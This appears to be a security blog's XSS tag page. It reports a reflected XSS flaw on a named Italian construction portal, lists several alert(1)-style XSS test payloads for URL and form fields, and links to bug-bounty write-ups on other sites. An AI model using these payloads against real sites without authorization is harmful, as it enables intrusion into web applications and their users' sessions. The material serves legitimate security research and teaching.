I navigated this website: https://www.edilportale.com, an Italian web portal on construction. I found out that it was vulnerable to reflected XSS, as seen in the image.
Tag: xss
Best XSS Vectors
Here’s a small #XSS list for manual testing (main cases, high success rate).
"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)
Try it on: – URL query, fragment & path; – all input fields.
From BruteLogic Twitter account : https://twitter.com/brutelogic
XSS in App1.bqrlinq.com (Got bounty and fixed)
Hitachi Incident Response Team (HIRT)
Hitachi HIRT xss reflected
Stored Cross-site Scripting (XSS) vulnerability in Charitybuzz.com
How I was able to discover a Stored XSS vulnerability in Charitybuzz.com – Binit Ghimire
Stored Cross-site Scripting (XSS) vulnerability in 1MB.site
How I discovered a Stored XSS vulnerability in 1MB.site – Binit Ghimire
How I was able to Discover a Stored Cross-site Scripting (XSS) vulnerability in Flaticon
How I was able to Discover a Stored Cross-site Scripting (XSS) vulnerability in Flaticon – Binit Ghimire
Pwnie Express – Cross-site Scripting (XSS)
XSS ( Cross Site Scripting ) at Motorola
Everything about XSS is in this source!
My name is Ismail Tasdelen. As a security researcher. In this article, I created a resource for you to get better information about xss. There are many xss bypass payloads in this resource, and there are a lot of technical sources. I hope that will be useful.